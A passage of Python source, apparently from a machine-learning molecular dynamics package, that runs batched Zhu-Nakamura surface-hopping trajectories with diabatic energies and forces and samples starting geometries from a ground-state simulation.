# get positions at previous time step for all trajectories at
# crossings
xyz_data = [trj.position_list[-2] for trj in diabat_trjs]
for i, xyz in enumerate(xyz_data):
z_arr = diabat_trjs[i].atoms.get_atomic_numbers()
nxyz = np.concatenate([z_arr.reshape(-1, 1), xyz], axis=-1)
dataset.props['nxyz'][i] = torch.Tensor(nxyz)
# technically not generating neighbors here isn't totally consistent,
# because it's possible that neighbors were generated at the subsequent
# step in `update_energies_forces`, and you're using those neighbors
# now, whereas they really weren't used in the original calculation of
# the forces at this step. But assuming the neighbor list is getting
# updated frequently enough that this doesn't affect the engrads too
# much, we shouldn't have to worry about it
loader = DataLoader(dataset,
batch_size=self.batch_size,
collate_fn=collate_dicts)
for i, batch in enumerate(loader):
batch = batch_to(batch, self.device)
diabat_keys = np.array(self.model.diabatic_readout.diabat_keys)
diag_diabats = diabat_keys.diagonal()
extra_grads = [f"{key}_grad" for key in diag_diabats]
results = batch_detach(self.model(batch, extra_grads=extra_grads))
for key in [*self.grad_keys, *extra_grads]:
N = batch["num_atoms"].cpu().detach().numpy().tolist()
results[key] = torch.split(results[key], N)
current_trj = i * self.batch_size
end_trj = current_trj + self.batch_size
for j, trj in enumerate(diabat_trjs[current_trj: end_trj]):
num_states = diabat_keys.shape[0]
# store the diabatic energies as a matrix
diabat_ens = np.zeros((num_states, num_states))
# only store the diagonal diabatic forces
diabat_forces = np.zeros((num_states, N[j], 3))
for l in range(num_states):
for m in range(num_states):
d_key = diabat_keys[l, m]
diabat_en_kcal = results[d_key][j].item()
diabat_en_au = diabat_en_kcal * KCAL_TO_AU["energy"]
diabat_ens[l, m] = diabat_en_au
if l == m:
diabat_force_kcal = -(results[f"{d_key}_grad"][j]
.detach().cpu().numpy())
diabat_force_au = (diabat_force_kcal
* KCAL_TO_AU["energy"]
* KCAL_TO_AU["_grad"])
diabat_forces[l, :] = diabat_force_au
trj.diabat_ens = diabat_ens
trj.diabat_forces = diabat_forces
def single_pos_step(self, i):
self.zhu_trjs[i].position_step()
def save_par(self, i):
trj = self.zhu_trjs[i]
# trj.velocity_step()
# trj.full_step(compute_internal_forces=False)
# print(trj.time)
if trj.time < self.max_time:
trj.save()
def step(self,
get_new_neighbors,
do_save=True):
"""
Take a step for each trajectory
Args:
get_new_neighbors (bool): whether to update the neighbor list
Returns:
None
"""
for trj in self.zhu_trjs:
# take a position step based on previous energies and forces
trj.position_step()
# run position steps in parallel - for some reason a single process
# is the most efficient and is still much faster than a for-loop
# when it comes to saving csvs
# pool.imap_unordered(self.single_pos_step, range(num_trjs))
# update the energies and forces
self.update_energies_forces(trjs=self.zhu_trjs,
get_new_neighbors=get_new_neighbors)
for trj in self.zhu_trjs:
# take a velocity step
trj.velocity_step(do_log=do_save)
if self.explicit_diabat:
self.add_diabat_forces()
for trj in self.zhu_trjs:
# take a "full_step" with compute_internal_forces=False,
# which just amounts to checking if you're at a crossing and
# potentially hopping
trj.full_step(compute_internal_forces=False,
do_log=do_save)
for trj in self.zhu_trjs:
if trj.time < self.max_time and do_save:
trj.save()
# pool = Pool(processes=1)
# num_trjs = len(self.zhu_trjs)
# pool.imap_unordered(self.save_par, range(1))
# pool.close()
# multi_pool = Pool(processes=5)
# multi_pool.map(self.save_par, range(1))
# multi_pool.close()
# multi_pool.join()
# q = mp.Queue()
# p = mp.Process(target=self.save_par, args=range(1))
# p.start()
# print(q.get())
# p.join()
def run(self):
"""
Run all the trajectories
"""
# initial energy and force calculation to get things started
self.update_energies_forces(trjs=self.zhu_trjs,
get_new_neighbors=True)
complete = False
num_steps = 0
save_steps = int(self.save_period / (self.dt / FS_TO_AU))
while not complete:
get_new_neighbors = np.mod(num_steps,
self.nbr_update_period) == 0
do_save = np.mod(num_steps, save_steps) == 0
self.step(get_new_neighbors=get_new_neighbors,
do_save=do_save)
if do_save:
print(f"Completed step {num_steps}")
complete = all([trj.time >= self.max_time
for trj in self.zhu_trjs])
num_steps += 1
print("Neural ZN terminated normally.")
# for trj in self.zhu_trjs:
# trj.output_to_json()
class CombinedZhuNakamura:
"""
Class for combining an initial ground state MD simulation with BatchedZhuNakamura.
Attributes:
ground_dynamics: trajectory on the ground state
ground_savefile (str) : name of output file from ground state trajectory
equil_time (float): length of time to let the system equilibrate on the ground state
before sampling geometries for a subsequent Zhu-Nakamura run
num_trj (int): number of excited state trajectories to run in parallel
zhu_params (dict): parameters for Zhu-Nakamura run
batched_params (dict): parameters for batching Zhu Nakamura
props (dict): dataset props
ground_params (dict): parameters for ground state MD
"""
def __init__(self,
atoms,
zhu_params,
batched_params,
ground_params,
props,
modelparams=None,
model_type=None,
needs_angles=False):
"""
Initialize:
atoms: ase Atoms objects
zhu_params: see above
batched_params: see above
ground_params: see above
props: see above
"""
ase_ground_params = copy.deepcopy(ground_params)
# the Dynamics classes we've made automatically convert to ASE units
# ase_ground_params["max_time"] *= FS_TO_ASE
# ase_ground_params["timestep"] *= FS_TO_ASE
ase_ground_params["trajectory"] = ground_params.get("savefile")
# ase_ground_params["temperature"] = ground_params["temperature"]*KB_EV
self.nms = ase_ground_params.get("nms")
if not self.nms:
method = METHOD_DIC[ase_ground_params["thermostat"]]
self.ground_dynamics = method(atoms, **ase_ground_params)
self.ground_savefile = ground_params.get("savefile")
self.equil_time = ground_params.get("equil_time")
self.num_trj = batched_params["num_trj"]
self.zhu_params = zhu_params
self.batched_params = batched_params
self.props = props
self.ground_params = ground_params
self.modelparams = modelparams
self.model_type = model_type
self.needs_angles = needs_angles
def sample_ground_geoms(self):
"""
Run a ground state trajectory and extract starting geometries and velocities for each
Zhu Nakamura trajectory.
Args:
None
Returns:
actual_states (list): list of atoms objects extracted from the trajectories.
"""
if self.nms:
temp = self.ground_params.get(
"temperature", self.ground_params.get("T_init"))
actual_states = nms_sample(
params=self.ground_params,
classical=self.ground_params["classical"],
num_samples=self.num_trj,
kt=25.7 / 1000 / 27.2 * temp / 300,
hb=1)
return actual_states
steps = int(self.ground_params["max_time"] /
self.ground_params["timestep"])
equil_steps = int(self.ground_params["equil_time"] /
self.ground_params["timestep"])
self.ground_dynamics.run(steps=steps)
trj = Trajectory(self.ground_savefile)
loginterval = self.ground_params.get("loginterval", 1)
logged_equil = int(equil_steps / loginterval)
possible_states = [trj[index] for index in
range(logged_equil, len(trj))]
random_indices = random.sample(range(len(possible_states)),
self.num_trj)
actual_states = [possible_states[index] for index in random_indices]
return actual_states
def run(self):
"""
Run a ground state trajectory followed by a set of parallel Zhu Nakamura trajectories.
"""
set_start_method('spawn')
atoms_list = self.sample_ground_geoms()
# print(atoms_list[0].get_kinetic_energy())
# print(atoms_list[0].get_positions())
# print(atoms_list[0].get_velocities())
# mp.set_start_method('spawn')
batched_zn = BatchedZhuNakamura(atoms_list=atoms_list,
props=self.props,
batched_params=self.batched_params,
zhu_params=self.zhu_params,
modelparams=self.modelparams,
model_type=self.model_type,
needs_angles=self.needs_angles)
batched_zn.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.